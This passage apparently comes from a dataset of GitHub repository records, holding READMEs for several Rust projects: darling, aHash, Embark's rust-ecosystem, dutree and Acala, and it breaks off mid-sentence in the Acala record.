1.31+](https://img.shields.io/badge/rustc-1.31+-lightgray.svg)](https://blog.rust-lang.org/2018/12/06/Rust-1.31-and-rust-2018.html)\n\n`darling` is a crate for proc macro authors, which enables parsing attributes into structs. It is heavily inspired by `serde` both in its internals and in its API.\n\n# Benefits\n* Easy and declarative parsing of macro input - make your proc-macros highly controllable with minimal time investment.\n* Great validation and errors, no work required. When users of your proc-macro make a mistake, `darling` makes sure they get error markers at the right place in their source, and provides \"did you mean\" suggestions for misspelled fields.\n\n# Usage\n`darling` provides a set of traits which can be derived or manually implemented.\n\n1. `FromMeta` is used to extract values from a meta-item in an attribute. Implementations are likely reusable for many libraries, much like `FromStr` or `serde::Deserialize`. Trait implementations are provided for primitives, some std types, and some `syn` types.\n2. `FromDeriveInput` is implemented or derived by each proc-macro crate which depends on `darling`. This is the root for input parsing; it gets access to the identity, generics, and visibility of the target type, and can specify which attribute names should be parsed or forwarded from the input AST.\n3. `FromField` is implemented or derived by each proc-macro crate which depends on `darling`. Structs deriving this trait will get access to the identity (if it exists), type, and visibility of the field.\n4. `FromVariant` is implemented or derived by each proc-macro crate which depends on `darling`. Structs deriving this trait will get access to the identity and contents of the variant, which can be transformed the same as any other `darling` input.\n5. `FromAttributes` is a lower-level version of the more-specific `FromDeriveInput`, `FromField`, and `FromVariant` traits. Structs deriving this trait get a meta-item extractor and error collection which works for any syntax element, including traits, trait items, and functions. This is useful for non-derive proc macros.\n\n## Additional Modules\n* `darling::ast` provides generic types for representing the AST.\n* `darling::usage` provides traits and functions for determining where type parameters and lifetimes are used in a struct or enum.\n* `darling::util` provides helper types with special `FromMeta` implementations, such as `IdentList`.\n\n# Example\n\n```rust,ignore\n#[macro_use]\nextern crate darling;\nextern crate syn;\n\n#[derive(Default, FromMeta)]\n#[darling(default)]\npub struct Lorem {\n #[darling(rename = \"sit\")]\n ipsum: bool,\n dolor: Option,\n}\n\n#[derive(FromDeriveInput)]\n#[darling(attributes(my_crate), forward_attrs(allow, doc, cfg))]\npub struct MyTraitOpts {\n ident: syn::Ident,\n attrs: Vec,\n lorem: Lorem,\n}\n```\n\nThe above code will then be able to parse this input:\n\n```rust,ignore\n/// A doc comment which will be available in `MyTraitOpts::attrs`.\n#[derive(MyTrait)]\n#[my_crate(lorem(dolor = \"Hello\", sit))]\npub struct ConsumingType;\n```\n\n# Attribute Macros\nNon-derive attribute macros are supported.\nTo parse arguments for attribute macros, derive `FromMeta` on the argument receiver type, then pass `&syn::AttributeArgs` to the `from_list` method.\nThis will produce a normal `darling::Result` that can be used the same as a result from parsing a `DeriveInput`.\n\n## Macro Code\n```rust,ignore\nuse darling::FromMeta;\nuse syn::{AttributeArgs, ItemFn};\nuse proc_macro::TokenStream;\n\n#[derive(Debug, FromMeta)]\npub struct MacroArgs {\n #[darling(default)]\n timeout_ms: Option,\n path: String,\n}\n\n#[proc_macro_attribute]\nfn your_attr(args: TokenStream, input: TokenStream) -> TokenStream {\n let attr_args = parse_macro_input!(args as AttributeArgs);\n let _input = parse_macro_input!(input as ItemFn);\n\n let _args = match MacroArgs::from_list(&attr_args) {\n Ok(v) => v,\n Err(e) => { return TokenStream::from(e.write_errors()); }\n };\n\n // do things with `args`\n unimplemented!()\n}\n```\n\n## Consuming Code\n```rust,ignore\nuse your_crate::your_attr;\n\n#[your_attr(path = \"hello\", timeout_ms = 15)]\nfn do_stuff() {\n println!(\"Hello\");\n}\n```\n\n# Features\nDarling's features are built to work well for real-world projects.\n\n* **Defaults**: Supports struct- and field-level defaults, using the same path syntax as `serde`. \n Additionally, `Option` and `darling::util::Flag` fields are innately optional; you don't need to declare `#[darling(default)]` for those.\n* **Field Renaming**: Fields can have different names in usage vs. the backing code.\n* **Auto-populated fields**: Structs deriving `FromDeriveInput` and `FromField` can declare properties named `ident`, `vis`, `ty`, `attrs`, and `generics` to automatically get copies of the matching values from the input AST. `FromDeriveInput` additionally exposes `data` to get access to the body of the deriving type, and `FromVariant` exposes `fields`.\n* **Mapping function**: Use `#[darling(map=\"path\")]` or `#[darling(and_then=\"path\")]` to specify a function that runs on the result of parsing a meta-item field. This can change the return type, which enables you to parse to an intermediate form and convert that to the type you need in your struct.\n* **Skip fields**: Use `#[darling(skip)]` to mark a field that shouldn't be read from attribute meta-items.\n* **Multiple-occurrence fields**: Use `#[darling(multiple)]` on a `Vec` field to allow that field to appear multiple times in the meta-item. Each occurrence will be pushed into the `Vec`.\n* **Span access**: Use `darling::util::SpannedValue` in a struct to get access to that meta item's source code span. This can be used to emit warnings that point at a specific field from your proc macro. In addition, you can use `darling::Error::write_errors` to automatically get precise error location details in most cases.\n* **\"Did you mean\" suggestions**: Compile errors from derived darling trait impls include suggestions for misspelled fields.\n\n## Shape Validation\nSome proc-macros only work on structs, while others need enums whose variants are either unit or newtype variants.\nDarling makes this sort of validation extremely simple.\nOn the receiver that derives `FromDeriveInput`, add `#[darling(supports(...))]` and then list the shapes that your macro should accept.\n\n|Name|Description|\n|---|---|\n|`any`|Accept anything|\n|`struct_any`|Accept any struct|\n|`struct_named`|Accept structs with named fields, e.g. `struct Example { field: String }`|\n|`struct_newtype`|Accept newtype structs, e.g. `struct Example(String)`|\n|`struct_tuple`|Accept tuple structs, e.g. `struct Example(String, String)`|\n|`struct_unit`|Accept unit structs, e.g. `struct Example;`|\n|`enum_any`|Accept any enum|\n|`enum_named`|Accept enum variants with named fields|\n|`enum_newtype`|Accept newtype enum variants|\n|`enum_tuple`|Accept tuple enum variants|\n|`enum_unit`|Accept unit enum variants|\n\nEach one is additive, so listing `#[darling(supports(struct_any, enum_newtype))]` would accept all structs and any enum where every variant is a newtype variant.\n\nThis can also be used when deriving `FromVariant`, without the `enum_` prefix.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tkaitchuck/aHash", "link": "https://github.com/tkaitchuck/aHash", "tags": ["rust", "hash", "hashing", "aes"], "stars": 687, "description": "aHash is a non-cryptographic hashing algorithm that uses the AES hardware instruction", "lang": "Rust", "repo_lang": "", "readme": "# aHash ![Build Status](https://img.shields.io/github/actions/workflow/status/tkaitchuck/aHash/rust.yml?branch=master) ![Licence](https://img.shields.io/crates/l/ahash) ![Downloads](https://img.shields.io/crates/d/ahash) \n\nAHash is the [fastest](https://github.com/tkaitchuck/aHash/blob/master/compare/readme.md#Speed), \n[DOS resistant hash](https://github.com/tkaitchuck/aHash/wiki/How-aHash-is-resists-DOS-attacks) currently available in Rust.\nAHash is intended *exclusively* for use in in-memory hashmaps. \n\nAHash's output is of [high quality](https://github.com/tkaitchuck/aHash/blob/master/compare/readme.md#Quality) but aHash is **not** a cryptographically secure hash.\n\n## Design\n\nBecause AHash is a keyed hash, each map will produce completely different hashes, which cannot be predicted without knowing the keys.\n[This prevents DOS attacks where an attacker sends a large number of items whose hashes collide that get used as keys in a hashmap.](https://github.com/tkaitchuck/aHash/wiki/How-aHash-is-resists-DOS-attacks)\n\nThis also avoids [accidentally quadratic behavior by reading from one map and writing to another.](https://accidentallyquadratic.tumblr.com/post/153545455987/rust-hash-iteration-reinsertion)\n\n## Goals and Non-Goals\n\nAHash does *not* have a fixed standard for its output. This allows it to improve over time. For example,\nif any faster algorithm is found, aHash will be updated to incorporate the technique.\nSimilarly, should any flaw in aHash's DOS resistance be found, aHash will be changed to correct the flaw.\n\nBecause it does not have a fixed standard, different computers or computers on different versions of the code will observe different hash values.\nAs such, aHash is not recommended for use other than in-memory maps. Specifically, aHash is not intended for network use or in applications which persist hashed values.\n(In these cases `HighwayHash` would be a better choice)\n\nAdditionally, aHash is not intended to be cryptographically secure and should not be used as a MAC, or anywhere which requires a cryptographically secure hash.\n(In these cases `SHA-3` would be a better choice)\n\n## Usage\n\nAHash is a drop in replacement for the default implementation of the `Hasher` trait. To construct a `HashMap` using aHash \nas its hasher do the following:\n\n```rust\nuse ahash::{AHasher, RandomState};\nuse std::collections::HashMap;\n\nlet mut map: HashMap = HashMap::default();\nmap.insert(12, 34);\n```\nFor convenience, wrappers called `AHashMap` and `AHashSet` are also provided.\nThese do the same thing with slightly less typing.\n```rust\nuse ahash::AHashMap;\n\nlet mut map: AHashMap = AHashMap::new();\nmap.insert(12, 34);\nmap.insert(56, 78);\n```\n\n## Flags\n\nThe aHash package has the following flags:\n* `std`: This enables features which require the standard library. (On by default) This includes providing the utility classes `AHashMap` and `AHashSet`.\n* `serde`: Enables `serde` support for the utility classes `AHashMap` and `AHashSet`.\n* `runtime-rng`: To obtain a seed for Hashers will obtain randomness from the operating system. (On by default)\nThis is done using the [getrandom](https://github.com/rust-random/getrandom) crate.\n* `compile-time-rng`: For OS targets without access to a random number generator, `compile-time-rng` provides an alternative.\nIf `getrandom` is unavailable and `compile-time-rng` is enabled, aHash will generate random numbers at compile time and embed them in the binary.\nThis allows for DOS resistance even if there is no random number generator available at runtime (assuming the compiled binary is not public).\nThis makes the binary non-deterministic. (If non-determinism is a problem see [constrandom's documentation](https://github.com/tkaitchuck/constrandom#deterministic-builds))\n\nIf both `runtime-rng` and `compile-time-rng` are enabled the `runtime-rng` will take precedence and `compile-time-rng` will do nothing.\nIf neither flag is set, seeds can be supplied by the application. [Multiple apis](https://docs.rs/ahash/latest/ahash/random_state/struct.RandomState.html)\nare available to do this.\n\n## Comparison with other hashers\n\nA full comparison with other hashing algorithms can be found [here](https://github.com/tkaitchuck/aHash/blob/master/compare/readme.md)\n\n![Hasher performance](https://docs.google.com/spreadsheets/d/e/2PACX-1vSK7Li2nS-Bur9arAYF9IfT37MP-ohAe1v19lZu5fd9MajI1fSveLAQZyEie4Ea9k5-SWHTff7nL2DW/pubchart?oid=1323618938&format=image)\n\nFor a more representative performance comparison which includes the overhead of using a HashMap, see [HashBrown's benchmarks](https://github.com/rust-lang/hashbrown#performance)\nas HashBrown now uses aHash as its hasher by default.\n\n## Hash quality\n\nAHash passes the full [SMHasher test suite](https://github.com/rurban/smhasher). \n\nThe code to reproduce the result, and the full output [are checked into the repo](https://github.com/tkaitchuck/aHash/tree/master/smhasher).\n\n## Additional FAQ\n\nA separate FAQ document is maintained [here](https://github.com/tkaitchuck/aHash/blob/master/FAQ.md). \nIf you have questions not covered there, open an issue [here](https://github.com/tkaitchuck/aHash/issues).\n\n## License\n\nLicensed under either of:\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n## Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any\nadditional terms or conditions.\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "If ahash is using multiple different algorithms under the hood, shouldn't there be multiple different lines for it on the performance graph?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "EmbarkStudios/rust-ecosystem", "link": "https://github.com/EmbarkStudios/rust-ecosystem", "tags": ["rust", "gamedev"], "stars": 686, "description": "Rust wants & tracking for Embark \ud83e\udd80", "lang": "Rust", "repo_lang": "", "readme": "# Embark Rust Ecosystem\n\n[![Embark logo](media/embark-logo-bg.jpg)](http://embark.games)\n\nHigh-level tracking and discussions about improving Rust and the Rust ecosystem for our game development use cases at [Embark](http://embark.games).\n\nCheck out the __[Issues](https://github.com/EmbarkStudios/rust-ecosystem/issues)__ for active topics. And our [embark.dev](https://embark.dev) open source portal.\n\n## Background\n\nWhen we started Embark, we chose Rust as our primary language for the long term future we are building. We love the safety and robustness of the language, the ability to write high performance, safe, and (mostly) bug free code and then fearlessly refactor and change it without common lifetime/ownership, memory safety or race condition problems.\n\nThat, combined with the openness and collaborative nature of the quickly growing ecosystem of and around Rust with crates.io and the tens of thousands of open source crates with a best-in-class package system, [cargo](https://doc.rust-lang.org/cargo/), truly makes Rust [a language for the next 40 years](https://www.youtube.com/watch?v=A3AdN7U24iU).\n\nWe believe that by openly sharing our work, issues, and ideas with the community, we'll create more opportunities for collaboration and discussion to bring us toward a great future for Rust and for the games industry in general.\n\n-- Johan Andersson ([`@repi`](http://twitter.com/repi)), CTO, Embark\n\n## Open Source\n\nOpen source Rust projects we've created so far and are actively using and maintaining:\n\nName | Description | Crates.io\n--- | --- | ---\n\ud83c\udf0b [`ash-molten`](https://github.com/EmbarkStudios/ash-molten.git) | Statically linked MoltenVK for Vulkan on Mac using Ash | [![Latest version](https://img.shields.io/crates/v/ash-molten.svg)](https://crates.io/crates/ash-molten)\n\ud83d\udc77 [`buildkite-jobify`](https://github.com/EmbarkStudios/buildkite-jobify) | Kubekite, but in Rust, using configuration from your repos\n\ud83d\udcdc [`cargo-about`](https://github.com/EmbarkStudios/cargo-about) | Cargo plugin to generate list of all licenses for a crate | [![Latest version](https://img.shields.io/crates/v/cargo-about.svg)](https://crates.io/crates/cargo-about)\n\u274c [`cargo-deny`](https://github.com/EmbarkStudios/cargo-deny) | Cargo plugin to help you manage large dependency graphs | [![Latest version](https://img.shields.io/crates/v/cargo-deny.svg)](https://crates.io/crates/cargo-deny)\n\ud83c\udf81 [`cargo-fetcher`](https://github.com/EmbarkStudios/cargo-fetcher) | `cargo fetch` alternative for use in CI or other \"clean\" environments | [![Latest version](https://img.shields.io/crates/v/cargo-fetcher.svg)](https://crates.io/crates/cargo-fetcher)\n\ud83e\udde0 [`cervo`](https://github.com/EmbarkStudios/cervo) | Middleware used for ML inference in our games. | [![Latest version](https://img.shields.io/crates/v/cervo.svg)](https://crates.io/crates/cervo)\n\u2699\ufe0f [`cfg-expr`](https://github.com/EmbarkStudios/cfg-expr) | A parser and evaluator for Rust `cfg()` expressions | [![Latest version](https://img.shields.io/crates/v/cfg-expr.svg)](https://crates.io/crates/cfg-expr)\n\ud83d\udcd2 [`cloud-dns`](https://github.com/EmbarkStudios/cloud-dns) | Client to interact with Google Cloud DNS v1 | [![Latest version](https://img.shields.io/crates/v/cloud-dns.svg)](https://crates.io/crates/cloud-dns) |\n\ud83d\udd25 [`crash-handling`](https://github.com/EmbarkStudios/crash-handling) | Collection of crates for catching and handling crashes\n\u26f4\ufe0f [`discord-sdk`](https://github.com/EmbarkStudios/discord-sdk) | An open implementation of the Discord Game SDK in Rust | [![Latest version](https://img.shields.io/crates/v/discord-sdk.svg)](https://crates.io/crates/discord-sdk)\n\ud83d\ude99 [`gsutil`](https://github.com/EmbarkStudios/gsutil) | A small, incomplete replacement for the official gsutil | [![Latest version](https://img.shields.io/crates/v/gsutil.svg)](https://crates.io/crates/gsutil)\n\ud83d\udca1 [`kajiya`](https://github.com/EmbarkStudios/kajiya) | Experimental real-time global illumination renderer\n\ud83d\udce6 [`krates`](https://github.com/EmbarkStudios/krates) | Creates graphs of crates from cargo metadata | [![Latest version](https://img.shields.io/crates/v/krates.svg)](https://crates.io/crates/krates)\n\ud83c\udd99 [`octobors`](https://github.com/EmbarkStudios/octobors) | GitHub action for automerging PRs based on a few rules\n\ud83c\udfb3 [`physx`](https://github.com/EmbarkStudios/physx-rs) | Use [NVIDIA PhysX](https://github.com/NVIDIAGameWorks/PhysX) in Rust | [![Latest version](https://img.shields.io/crates/v/physx.svg)](https://crates.io/crates/physx)\n\u231b [`poll-promise`](https://github.com/EmbarkStudios/poll-promise) | A Rust promise for games and immediate mode GUIs | [![Latest version](https://img.shields.io/crates/v/poll-promise.svg)](https://crates.io/crates/poll-promise)\n\ud83d\udddc [`presser`](https://github.com/EmbarkStudios/presser) | A helper crate for doing low-level data copies | [![Latest version](https://img.shields.io/crates/v/presser.svg)](https://crates.io/crates/presser)\n\ud83d\udc26 [`puffin`](https://github.com/EmbarkStudios/puffin) | Simple instrumentation profiler for Rust | [![Latest version](https://img.shields.io/crates/v/puffin.svg)](https://crates.io/crates/puffin)\n\ud83d\udcd3 [`relnotes`](https://github.com/EmbarkStudios/relnotes) | Automatic GitHub release notes | [![Latest version](https://img.shields.io/crates/v/relnotes.svg)](https://crates.io/crates/relnotes)\n\ud83d\udc0f [`rpmalloc-rs`](https://github.com/EmbarkStudios/rpmalloc-rs) | Cross-platform Rust global memory allocator using [rpmalloc](https://github.com/rampantpixels/rpmalloc) | [![Latest version](https://img.shields.io/crates/v/rpmalloc.svg)](https://crates.io/crates/rpmalloc)\n\ud83d\udc09 [`rust-gpu`](https://github.com/EmbarkStudios/rust-gpu) | Making Rust a first-class language & ecosystem for GPU code |\n\ud83c\udf0c [`rymder`](https://github.com/EmbarkStudios/rymder) | Unofficial agones client | [![Latest version](https://img.shields.io/crates/v/rymder.svg)](https://crates.io/crates/rymder)\n\ud83c\udd94 [`spdx`](https://github.com/EmbarkStudios/spdx) | Helper crate for SPDX expressions | [![Latest version](https://img.shields.io/crates/v/spdx.svg)](https://crates.io/crates/spdx)\n\ud83d\udee0 [`spirv-tools-rs`](https://github.com/EmbarkStudios/spirv-tools-rs) | An unofficial wrapper for SPIR-V Tools | [![Latest version](https://img.shields.io/crates/v/spirv-tools.svg)](https://crates.io/crates/spirv-tools)\n\ud83d\udd06 [`superluminal-perf`](https://github.com/EmbarkStudios/superluminal-perf-rs) | [Superluminal Performance](http://superluminal.eu) profiler integration | [![Latest version](https://img.shields.io/crates/v/superluminal-perf.svg)](https://crates.io/crates/superluminal-perf)\n\ud83d\udcc2 [`tame-gcs`](https://github.com/EmbarkStudios/tame-gcs) | Google Cloud Storage functions that follows the sans-io approach | [![Latest version](https://img.shields.io/crates/v/tame-gcs.svg)](https://crates.io/crates/tame-gcs)\n\ud83d\udd10 [`tame-oauth`](https://github.com/EmbarkStudios/tame-oauth) | Small OAuth crate that follows the sans-io approach | [![Latest version](https://img.shields.io/crates/v/tame-oauth.svg)](https://crates.io/crates/tame-oauth)\n\ud83e\uddec [`tame-oidc`](https://github.com/EmbarkStudios/tame-oidc) | Small OIDC crate that follows the sans-io approach | [![Latest version](https://img.shields.io/crates/v/tame-oidc.svg)](https://crates.io/crates/tame-oidc)\n\ud83c\udfa8 [`texture-synthesis`](https://github.com/EmbarkStudios/texture-synthesis) | Example-based texture synthesis generator and CLI example | [![Latest version](https://img.shields.io/crates/v/texture-synthesis.svg)](https://crates.io/crates/texture-synthesis)\n\ud83d\udee0 [`tiny-bench`](https://github.com/EmbarkStudios/tiny-bench) | A tiny benchmarking library | [![Latest version](https://img.shields.io/crates/v/tiny-bench.svg)](https://crates.io/crates/tiny-bench) \n\u23f1\ufe0f [`tracing-ext-ffi-subscriber`](https://github.com/EmbarkStudios/tracing-ext-ffi-subscriber) | Subscriber for passing spans to a profiling tool via FFI. | [![Latest version](https://img.shields.io/crates/v/tracing-ext-ffi-subscriber.svg)](https://crates.io/crates/tracing-ext-ffi-subscriber)\n\ud83e\udeb5\ufe0f [`tracing-logfmt`](https://github.com/EmbarkStudios/tracing-logfmt) | A logfmt formatter for tracing-subscriber. | [![Latest version](https://img.shields.io/crates/v/tracing-logfmt.svg)](https://crates.io/crates/tracing-logfmt)\n\ud83d\udcab [`tryhard`](https://github.com/EmbarkStudios/tryhard) | Easily retry futures | [![Latest version](https://img.shields.io/crates/v/tryhard.svg)](https://crates.io/crates/tryhard)\n\nYou can see all these crates on our [crates.io profile](https://crates.io/users/embark-studios).\n\n### Contributing\n\nWe encourage contributions to any of our open source projects. If you're not sure where to start, look at the GitHub issues on any of the above projects!\n\nCheck out [`guidelines.md`](guidelines.md) for our guidelines & policies for how we develop in Rust.\n\nTo make sure we keep a friendly and safe environment for everyone, we have a Contributor Code of Conduct. You can read this in any of our projects' repositories. By contributing to our projects, you agree to the code of conduct.\n\n## Areas of Interest\n\nAreas that we are interested in or working on, and want to help see improved in Rust:\n\n* \u2638 __[Distributed systems](https://areweasyncyet.rs/)__ - [async](https://rust-lang.github.io/async-book/), [tokio](https://tokio.rs/), [tonic](https://github.com/hyperium/tonic)\n\n* \ud83d\udd79\ufe0f __[Game engine systems](http://arewegameyet.com/)__ - multiplayer, rendering, physics, audio, server, assets, workflows\n\n* \ud83d\udce6 __Developer experience__ - fast iteration with large projects/monorepos, distributed builds, debugging, profiling, IDE\n\n* \ud83d\udef8 __[WebAssembly](https://webassembly.org/) and [WASI](https://hacks.mozilla.org/2019/03/standardizing-wasi-a-webassembly-system-interface/)__ - sandboxed safe Rust code on client, edge & cloud\n\n* \ud83e\udd16 __[Machine learning](http://www.arewelearningyet.com/)__ - efficient inference, library bindings, training environments\n\n* \ud83d\ude80 __High performance runtime__ - CPU job scheduling, code generation, optimizing crates\n\n* \ud83d\udcfa\ud83d\udcf1 __Console & mobile platform support__ - PlayStation, Xbox, Android. [#18](https://github.com/EmbarkStudios/rust-ecosystem/issues/18)\n\n* \ud83c\udfce [__Rust on GPU__](https://shader.rs) - future compute & ML programming models beyond shaders, \n\nWe track and discuss these from our perspective in the __[Issues](https://github.com/EmbarkStudios/rust-ecosystem/issues)__ for visibility and to get feedback, feel free to join in if you have ideas!\n\nAlso check out the [Rust Game Development Working Group](https://github.com/rust-gamedev/wg).\n\n## Sponsorships\n\nWe believe that open source creators are integral to the success of the Rust ecosystem, as well as our own success. We offer monetary sponsorship to several individuals and projects via Patreon, GitHub and OpenCollective.\n\nProjects we are currently sponsoring:\n\n* __[Bevy](https://bevyengine.org/)__ - _\"A refreshingly simple data-driven game engine built in Rust\"_\n* __[Dimforge](https://www.dimforge.com/)__ - _\"Open-Source Rust crates for numerical simulation\"_\n* __[rust-analyzer](https://github.com/rust-analyzer/rust-analyzer)__ - _\"Bringing a great IDE experience\nto the Rust programming language\"_\n* __[Clap](https://github.com/clap-rs/clap)__ - _\"Fast. Configurable. Argument Parsing for Rust\"_\n* __[Gtk-rs](https://gtk-rs.org/)__ - _\"Rust bindings for GTK+ 3, Cairo, GtkSourceView and other GLib-compatible libraries\"_\n* __[knurling-rs](https://knurling.ferrous-systems.com/)__ - _\"Improving the tools and material used to build, debug, and learn embedded systems\"_\n* __[Tokio](https://tokio.rs)__ - _\"Build reliable network applications without compromising speed\"_\n\nFull list of projects and individual developers we are sponsoring: [OpenCollective](https://opencollective.com/embarkstudios), [GitHub Sponsors](https://github.com/embark-studios) and [Patreon](https://www.patreon.com/embarkstudios/creators).\n\n## Work with us\n\nWe're actively looking to collaborate with developers on the areas discussed in this repository. If you're interested in working on a specific issue or idea highlighted here, please reach out to us at [`opensource@embark-studios.com`](mailto:opensource@embark-studios.com) to discuss contracting opportunities or sponsorship.\n\nWe are also [hiring](https://embark.games/jobs/) for full-time positions remotely within Europe or on-site in Stockholm!\n\nLet's go! \ud83d\ude80\n\n## License\n\nLicensed under either of\n\n* Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or )\n* MIT license ([LICENSE-MIT](LICENSE-MIT) or )\n\nat your option.\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted for inclusion in the work by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nachoparker/dutree", "link": "https://github.com/nachoparker/dutree", "tags": ["rust", "filesystem"], "stars": 685, "description": "a tool to analyze file system usage written in Rust", "lang": "Rust", "repo_lang": "", "readme": "# dutree\na tool to analyze file system usage written in Rust\n\n![Example](resources/dutree_featured.png)\n\n# Features\n\n - coloured output, according to the LS_COLORS environment variable.\n - display the file system tree\n - ability to aggregate small files\n - ability to exclude files or directories\n - ability to compare different directories\n - fast, written in Rust\n\nMore details at [ownyourbits.com](https://ownyourbits.com/2018/03/25/analize-disk-usage-with-dutree).\n\n# Usage\n\n```\n $ dutree --help\nUsage: dutree [options] [..]\n\nOptions:\n -d, --depth [DEPTH] show directories up to depth N (def 1)\n -a, --aggr [N[KMG]] aggregate smaller than N B/KiB/MiB/GiB (def 1M)\n -s, --summary equivalent to -da, or -d1 -a1M\n -u, --usage report real disk usage instead of file size\n -b, --bytes print sizes in bytes\n -f, --files-only skip directories for a fast local overview\n -x, --exclude NAME exclude matching files or directories\n -H, --no-hidden exclude hidden files\n -A, --ascii ASCII characters only, no colors\n -h, --help show help\n -v, --version print version number\n```\n\n# Installation\n\n```\ncargo install dutree\n```\n\nThere's also standalone binaries for Linux in the [Releases section](https://github.com/nachoparker/dutree/releases)\n\n## Arch Linux\n\nYou can install [the AUR package](https://aur.archlinux.org/packages/dutree/)\nwith an AUR helper like `pacaur`, or manually:\n\n```bash\ngit clone https://aur.archlinux.org/dutree.git\ncd dutree\nmakepkg -si\n```\n\n## Fedora\n\nYou can install `dutree` from the official Fedora repositories:\n\n```sh\n$ sudo dnf -y install dutree\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AcalaNetwork/Acala", "link": "https://github.com/AcalaNetwork/Acala", "tags": ["substrate", "rust", "stablecoin", "polkadot", "acala", "defi", "kusama"], "stars": 684, "description": "Acala - cross-chain DeFi hub and stablecoin based on Substrate for Polkadot and Kusama.", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n
\n\n\n[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/AcalaNetwork/Acala/test.yml?label=Actions&logo=github)](https://github.com/AcalaNetwork/Acala/actions)\n[![GitHub tag (latest by date)](https://img.shields.io/github/v/tag/AcalaNetwork/Acala)](https://github.com/AcalaNetwork/Acala/tags)\n[![Substrate version](https://img.shields.io/badge/Substrate-2.0.0-brightgreen?logo=Parity%20Substrate)](https://substrate.io/)\n[![codecov](https://codecov.io/gh/AcalaNetwork/Acala/branch/master/graph/badge.svg?token=ERf7EDgafw)](https://codecov.io/gh/AcalaNetwork/Acala)\n[![License](https://img.shields.io/github/license/AcalaNetwork/Acala?color=green)](https://github.com/AcalaNetwork/Acala/blob/master/LICENSE)\n
\n[![Twitter URL](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Ftwitter.com%2FAcalaNetwork)](https://twitter.com/AcalaNetwork)\n[![Discord](https://img.shields.io/badge/Discord-gray?logo=discord)](https://www.acala.gg/)\n[![Telegram](https://img.shields.io/badge/Telegram-gray?logo=telegram)](https://t.me/AcalaOfficial)\n[![Discourse](https://img.shields.io/badge/Forum-gray?logo=discourse)](https://acala.discourse.group/)\n[![Medium](https://img.shields.io/badge/Medium-gray?logo=medium)](https://medium.com/acalanetwork)\n\n
\n\n\n\n- [1. Introduction](#1-introduction)\n- [2. Overview](#2-overview)\n - [2.1. aUSD and the Honzon stablecoin protocol](#21-ausd-and-the-honzon-stablecoin-protocol)\n - [2.2. Acala Network Economic Model](#22-acala-network-economic-model)\n- [3. Building](#3-building)\n- [4. Run](#4-run)\n- [5. Development](#5-development)\n- [6. Bug Bounty :bug:](#6-bug-bounty-bug)\n\n\n\n# 1. Introduction\nThis project is initiated and facilitated by the Acala Foundation. Acala Foundation nurtures applications in the fields of decentralized finance protocols, particularly those that serve as open finance infrastructures such as stable currency and staking liquidity. The Acala Foundation is founded by [Laminar](https://laminar.one/) and [Polkawallet](https://polkawallet.io/) , participants and contributors to the Polkadot ecosystem. The Acala Foundation welcomes more industry participants as it progresses.\n\n# 2. Overview\nThe significance of cross-chain communication to the blockchain is like that of the internet to the intranet. Polkadot empowers a network of public, consortium and private blockchains, and enables true interoperability, economic and transactional scalability. A cross-chain stablecoin system will:\n1. Create a sound, stable currency for low cost, borderless value transfer for all chains in the network\n2. Enable commerical lending with predictable risk\n3. Serve as a building block for more open finance services\n\nThe Acala Dollar stablecoin (ticker: aUSD) is a multi-collateral-backed cryptocurrency, with value stable against US Dollar (aka. 1:1 aUSD to USD soft peg). It is completely decentralized, that it can be created using assets from blockchains connected to the Polkadot network including Ethereum and Bitcoin as collaterals, and can be used by any chains (or digital jurisdictions) within the Polkadot network and applications on those chains.\n\nBy this nature, it is essential that the Acala Network eventually become community-owned with an economic model that can sustain its development and participation in the Polkadot network, as well as ensure its stability and security. The following section will provide a high-level overview of the following topics:\n- aUSD and the Honzon stablecoin protocol\n- the economic model and initial parachain offering\n\n## 2.1. aUSD and the Honzon stablecoin protocol\nEvery aUSD is backed in excess by a crypto asset, the mechanism of which is known as an over-collateralized debt position (or CDP). Together with a set of incentives, supply & demand balancing, and risk management mechanisms, as the core components of the Honzon stablecoin protocol on the Acala Network, the stability of the aUSD is ensured. The CDP mechanism design is inspired by the first decentralized stablecoin project MakerDAO, which has become the DeFi building block in the Ethereum ecosystem. Besides, the Honzon protocol enables many unique features - native multi-asset support, cross-chain stablecoin capability, automatic liquidation to increase responsiveness to risk, and pluggable oracle and auction house to improve modularity, just to name a few.\n\nThe Honzon protocol contains the following components\n- Multi Collateral Type\n- Collateral Adapter\n- Oracle and Prices\n- Auction and Auction Manager\n- CDP and CDP Engine\n- Emergency shutdown\n- Governance\n- Honzon as an interface to other components\n\nNote: This section is still work in progress, we will update more information as we progress. Refer to the [Github Wiki](https://github.com/AcalaNetwork/Acala/wiki) for more details.\n\n## 2.2. Acala Network Economic Model\nThe Acala Network Token (ACA) features the following utilities, and the value of ACA token will accrue with the increased usage of the network and revenue from stability fees and liquidation penalties\n1. As Network Utility Token: to pay for network fees and stability fees\n2. As Governance Token: to vote for/against risk parameters and network change proposals\n3. As Economic Capital: in case of liquidation without sufficient collaterals\n\nTo enable cross-chain functionality, the Acala Network will connect to the Polkadot in one of the three ways:\n1. as parathread - pay-as-you-go connection to Polkadot\n2. as parachain - permanent connection for a given period\n3. as an independent chain with a bridge back to Polkadot\n\nBecoming a parachain would be an ideal option to bootstrap the Acala Network, and maximize its benefits and reach to other chains and applications on the Polkadot network. To secure a parachain slot, the Acala Network will require supportive DOT holders to lock their DOTs to bid for a slot collectively - a process known as the Initial Parachain Offering 